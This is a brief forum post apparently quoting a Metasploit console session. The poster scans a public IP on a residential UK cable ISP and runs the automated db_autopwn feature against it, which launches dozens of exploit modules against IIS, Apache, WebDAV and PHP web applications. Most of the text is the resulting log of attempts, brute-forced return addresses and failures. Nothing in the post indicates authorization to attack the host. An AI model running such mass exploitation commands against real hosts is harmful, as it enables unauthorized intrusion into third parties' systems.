here is the scan i did on the ip

nothing found


Quote:
msf > load db_sqlite3[*] Successfully loaded plugin: db_sqlite3
msf > db_destroy pentest
[-] Error while running command db_destroy: No such file or directory - pentest

Call stack:
/pentest/exploits/framework3/plugins/db_sqlite3.rb:125:in `unlink'
/pentest/exploits/framework3/plugins/db_sqlite3.rb:125:in `cmd_db_destroy'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:125:in `run'
/pentest/exploits/framework3/msfconsole:78
msf > db_create pentest[*] Creating a new database instance...[*] Successfully connected to the database[*] File: pentest
msf > db_nmap -PN 82.32.25.149[*] exec: "/usr/local/bin/nmap" "-PN" "82.32.25.149" "-oX" "/tmp/dbnmap.6888.0"
NMAP:
NMAP: Starting Nmap 4.60 ( http://nmap.org ) at 2008-12-22 14:16 GMT
NMAP: Interesting ports on 82-32-25-149.cable.ubr04.aztw.blueyonder.co.uk (82.32.25.149):
NMAP: Not shown: 1713 filtered ports
NMAP: PORT STATE SERVICE
NMAP: 80/tcp open http
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 31.816 seconds
msf > db_autopwn -p -t -e[*] Analysis completed in 6.95850586891174 seconds (0 vulns / 0 refs)[*] Matched auxiliary/scanner/http/frontpage against 82.32.25.149:80...[*] Matched exploit/windows/isapi/w3who_query against 82.32.25.149:80...[*] >> Exception from exploit/windows/isapi/w3who_query: Connection reset by peer[*] Matched exploit/windows/isapi/nsiislog_post against 82.32.25.149:80...[*] Launching exploit/windows/isapi/nsiislog_post (3/49) against 82.32.25.149:80...
[*] Matched exploit/windows/iis/ms01_033_idq against 82.32.25.149:80...[*] Brute forcing with 3 possible targets[*] Started bind handler[*] Trying target Windows 2000 -MS03-019...[*] Launching exploit/windows/iis/ms01_033_idq (4/49) against 82.32.25.149:80...[*] Sending request...[*] Started bind handler[*] Matched exploit/windows/http/sybase_easerver against 82.32.25.149:8080...[*] Launching exploit/windows/http/sybase_easerver (5/49) against 82.32.25.149:8080...[*] Matched exploit/windows/http/shttpd_post against 82.32.25.149:80...[*] Trying target Windows 2000 Pro English SP0...[*] Launching exploit/windows/http/shttpd_post (6/49) against 82.32.25.149:80...[*] Matched exploit/windows/http/savant_31_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/savant_31_overflow (7/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/multi/php/php_unserialize_zval_cookie against 82.32.25.149:80...[*] Launching exploit/multi/php/php_unserialize_zval_cookie (8/49) against 82.32.25.149:80...[*] Matched exploit/windows/proxy/bluecoat_winproxy_host against 82.32.25.149:80...[*] Launching exploit/windows/proxy/bluecoat_winproxy_host (9/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/privatewire_gateway against 82.32.25.149:80...[*] Launching exploit/windows/http/privatewire_gateway (10/49) against 82.32.25.149:80...[*] Trying target WinProxy <= 6.1 R1a Universal...[*] Started bind handler[*] Matched exploit/windows/http/hp_nnm against 82.32.25.149:80...[*] Launching exploit/windows/http/hp_nnm (11/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/pajax_remote_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/pajax_remote_exec (12/49) against 82.32.25.149:80...[*] Trying target HP OpenView Network Node Manager 7.50 / Windows 2000 All...[*] Started bind handler[*] Trying Windows 2000 English SP4 using jmp esp at 77e3c256[*] Matched exploit/multi/realserver/describe against 82.32.25.149:80...[*] Launching exploit/multi/realserver/describe (13/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/isapi/fp30reg_chunked against 82.32.25.149:80...[*] RealServer universal exploit launched against 82.32.25.149[*] Launching exploit/windows/isapi/fp30reg_chunked (14/49) against 82.32.25.149:80...[*] Kill the master rmserver pid to prevent shell disconnect[*] Started bind handler[*] Matched exploit/windows/http/psoproxy91_overflow against 82.32.25.149:8080...[*] Creating overflow request for fp30reg.dll...[*] Matched exploit/windows/http/apache_chunked against 82.32.25.149:80...[*] Launching exploit/windows/http/apache_chunked (16/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/oracle9i_xdb_pass against 82.32.25.149:8080...[*] Launching exploit/windows/http/oracle9i_xdb_pass (17/49) against 82.32.25.149:8080...[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ][*] Started bind handler[*] Matched exploit/windows/iis/ms02_018_htr against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms02_018_htr (18/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/sphpblog_file_upload against 82.32.25.149:80...[*] Launching exploit/unix/webapp/sphpblog_file_upload (19/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_wordpress_lastpost against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_wordpress_lastpost (20/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_vbulletin_template against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_vbulletin_template (21/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/iis/ms03_007_ntdll_webdav against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms03_007_ntdll_webdav (22/49) against 82.32.25.149:80...[*] Trying target Oracle 9.2.0.1 Universal...[*] Started bind handler[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ][*] Matched exploit/windows/http/badblue_passthru against 82.32.25.149:80...
[-] Exploit failed: Connection reset by peer[*] Launching exploit/windows/http/badblue_passthru (23/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/admin/cisco/ios_http_auth_bypass against 82.32.25.149:80...[*] Matched exploit/windows/http/xitami_if_mod_since against 82.32.25.149:80...[*] Trying target BadBlue 2.72b Universal...[*] Launching exploit/windows/http/xitami_if_mod_since (25/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/unix/webapp/google_proxystylesheet_exec against 82.32.25.149:80...[*] Waiting for payload to execute...[*] >> Exception from exploit/unix/webapp/google_proxystylesheet_exec: protected method `autofilter' called for #
<#<Class:0xb6c916f0>:0xb6a86a18>[*] Matched exploit/windows/isapi/rsa_webagent_redirect against 82.32.25.149:80...[*] Launching exploit/windows/isapi/rsa_webagent_redirect (27/49) against 82.32.25.149:80...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/windows/iis/ms01_023_printer against 82.32.25.149:80...[*] Launching exploit/windows/iis/ms01_023_printer (28/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ][*] Matched exploit/windows/http/trendmicro_officescan against 82.32.25.149:8080...[*] Launching exploit/windows/http/trendmicro_officescan (29/49) against 82.32.25.149:8080...
[-] Exploit failed: No encoders encoded the buffer successfully.[*] Matched exploit/windows/http/ipswitch_wug_maincfgret against 82.32.25.149:80...[*] Launching exploit/windows/http/ipswitch_wug_maincfgret (30/49) against 82.32.25.149:80...[*] Started bind handler
[-] Exploit failed: Connection reset by peer[*] Matched exploit/windows/http/ia_webmail against 82.32.25.149:80...[*] Launching exploit/windows/http/ia_webmail (31/49) against 82.32.25.149:80...[*] Trying target WhatsUP Gold 8.03 Universal...
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Started bind handler[*] Matched exploit/windows/http/apache_modjk_overflow against 82.32.25.149:80...[*] Sending request...[*] Launching exploit/windows/http/apache_modjk_overflow (32/49) against 82.32.25.149:80...[*] Matched exploit/unix/webapp/phpbb_highlight against 82.32.25.149:80...[*] Started bind handler[*] Launching exploit/unix/webapp/phpbb_highlight (33/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/scanner/http/writable against 82.32.25.149:80...[*] Trying target mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)...[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/4 ][*] Matched auxiliary/scanner/http/frontpage_login against 82.32.25.149:80...[*] Matched exploit/windows/http/minishare_get_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/minishare_get_overflow (36/49) against 82.32.25.149:80...[*] Matched exploit/windows/http/mailenable_auth_header against 82.32.25.149:80...[*] Launching exploit/windows/http/mailenable_auth_header (37/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/windows/http/badblue_ext_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/badblue_ext_overflow (38/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_xmlrpc_eval against 82.32.25.149:80...[*] Launching exploit/unix/webapp/php_xmlrpc_eval (39/49) against 82.32.25.149:80...[*] Trying target BadBlue 2.5 (Universal)...[*] Started bind handler[*] Matched exploit/unix/webapp/cacti_graphimage_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/cacti_graphimage_exec (40/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched auxiliary/scanner/http/version against 82.32.25.149:80...[*] Matched auxiliary/dos/cisco/ios_http_percentpercent against 82.32.25.149:80...[*] Matched exploit/windows/http/navicopa_get_overflow against 82.32.25.149:80...[*] Launching exploit/windows/http/navicopa_get_overflow (43/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/guestbook_ssi_exec (44/49) against 82.32.25.149:80...[*] Trying target NaviCOPA 2.0.1 Universal[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/1 ][*] Started bind handler[*] Matched exploit/unix/webapp/barracuda_img_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/barracuda_img_exec (45/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/php_include against 82.32.25.149:80...[*] >> Exception from exploit/unix/webapp/php_include: protected method `autofilter' called for #<#<Class:0xb6bd2
5fc>:0xb6a76564>[*] Matched exploit/unix/webapp/openview_connectednodes_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/openview_connectednodes_exec (47/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/unix/webapp/awstats_configdir_exec against 82.32.25.149:80...[*] Launching exploit/unix/webapp/awstats_configdir_exec (48/49) against 82.32.25.149:80...[*] Started bind handler[*] Matched exploit/bsdi/softcart/mercantec_softcart against 82.32.25.149:80...[*] Launching exploit/bsdi/softcart/mercantec_softcart (49/49) against 82.32.25.149:80...[*] Started bind handler
msf >

msf >[*] Trying efbf3000...

msf >
msf >

msf >[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/3 ]

msf >[*] exploit failed
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/5 ]
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/7 ][*] Trying efbf32c1...[*] Refreshing the remote dllhost.exe process...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/2 ]
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/6 ]
[-] Exploit failed: Connection reset by peer
[-] Exploit failed: Connection reset by peer[*] Trying efbf3582...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/0 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/4 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/1 ][*] Trying efbf3843...
[-] Exploit failed: Connection reset by peer[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/3 ][*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/5 ][*] Trying efbf3b04...[*] Trying Apache.org Build 1.3.22->1.3.24 [ 0x00401141/7 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/2 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/6 ][*] Trying efbf3dc5...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/0 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/4 ][*] Trying efbf4086...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/1 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/3 ][*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/5 ][*] Trying efbf4347...[*] Trying Apache.org Build 1.3.19->1.3.24 [ 0x6ff6548d/7 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/2 ][*] Trying efbf4608...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/6 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/0 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/4 ][*] Trying efbf48c9...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/1 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/3 ][*] Trying efbf4b8a...[*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/5 ][*] Trying Apache.org Build 1.3.22 [ 0x6ff762ac/7 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/2 ][*] Trying efbf4e4b...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/6 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/0 ][*] Trying efbf510c...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/4 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/1 ][*] Trying efbf53cd...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/3 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/5 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows 2000) [ 0x1c0f13e5/7 ][*] Trying efbf568e...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/2 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/6 ][*] Trying efbf594f...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/0 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/4 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/1 ][*] Trying efbf5c10...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/3 ][*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/5 ][*] Trying efbf5ed1...[*] Trying Apache.org Build 1.3.17->1.3.24 (Windows NT) [ 0x1c0f1033/7 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/2 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/6 ][*] Trying efbf6192...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/5 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/4 ][*] Trying efbf6453...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/1 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/3 ][*] Trying Windows 2003 English SP0 [ 0x7ffc0638/0 ][*] Trying efbf6714...[*] Trying Windows 2003 English SP0 [ 0x7ffc0638/7 ][*] Trying Windows 2000 English [ 0x75022ac4/2 ][*] Trying efbf69d5...[*] Trying Windows 2000 English [ 0x75022ac4/6 ][*] Trying Windows 2000 English [ 0x75022ac4/5 ][*] Trying Windows 2000 English [ 0x75022ac4/4 ][*] Trying efbf6c96...[*] Trying Windows 2000 English [ 0x75022ac4/1 ][*] Trying Windows 2000 English [ 0x75022ac4/3 ][*] Trying efbf6f57...[*] Trying Windows 2000 English [ 0x75022ac4/0 ][*] Trying Windows 2000 English [ 0x75022ac4/7 ][*] Trying efbf7218...[*] Trying Oracle 8.1.7 Apache 1.3.12 [ 0x1d84d42c/7 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/5 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/6 ][*] Trying efbf74d9...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/0 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/4 ][*] Trying efbf779a...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/1 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/3 ][*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/2 ][*] Trying efbf7a5b...[*] Trying Oracle 9.1.0 Apache 1.3.12 [ 0x10016061/7 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/5 ][*] Trying efbf7d1c...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/6 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/0 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/4 ][*] Trying efbf7fdd...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/1 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/3 ][*] Trying efbf829e...[*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/2 ][*] Trying Oracle 9.2.0 Apache 1.3.22 [ 0x6ff6427a/7 ][*] Trying Debugging Target [ 0xcafebabe/0 ][*] Trying efbf855f...[*] Trying Debugging Target [ 0xcafebabe/1 ][*] Trying Debugging Target [ 0xcafebabe/2 ][*] Trying efbf8820...[*] Trying Debugging Target [ 0xcafebabe/3 ][*] Trying Debugging Target [ 0xcafebabe/4 ][*] Trying Debugging Target [ 0xcafebabe/5 ][*] Trying efbf8ae1...[*] Trying Debugging Target [ 0xcafebabe/6 ][*] Trying Debugging Target [ 0xcafebabe/7 ][*] Trying efbf8da2...[*] Trying efbf9063...[*] Trying efbf9324...[*] Trying efbf95e5...[*] Trying efbf98a6...[*] Trying efbf9b67...[*] Trying efbf9e28...[*] Trying efbfa0e9...[*] Trying efbfa3aa...[*] Trying efbfa66b...[*] Trying efbfa92c...[*] Trying efbfabed...[*] Trying efbfaeae...[*] Trying efbfb16f...[*] Trying efbfb430...[*] Trying efbfb6f1...[*] Trying efbfb9b2...[*] Trying efbfbc73...[*] Trying efbfbf34...[*] Trying efbfc1f5...[*] Trying efbfc4b6...[*] Trying efbfc777...[*] Trying efbfca38...[*] Trying efbfccf9...[*] Trying efbfcfba...[*] Trying efbfd27b...[*] Trying efbfd53c...[*] Trying efbfd7fd...[*] Trying efbfdabe...[*] Trying efbfdd7f...[*] Trying efbfe040...[*] Trying efbfe301...[*] Trying efbfe5c2...[*] Trying efbfe883...[*] Trying efbfeb44...[*] Trying efbfee05...[*] Trying efbff0c6...[*] Trying efbff387...[*] Trying efbff648...[*] Trying efbff909...[*] Trying efbffbca...[*] Trying efbffe8b...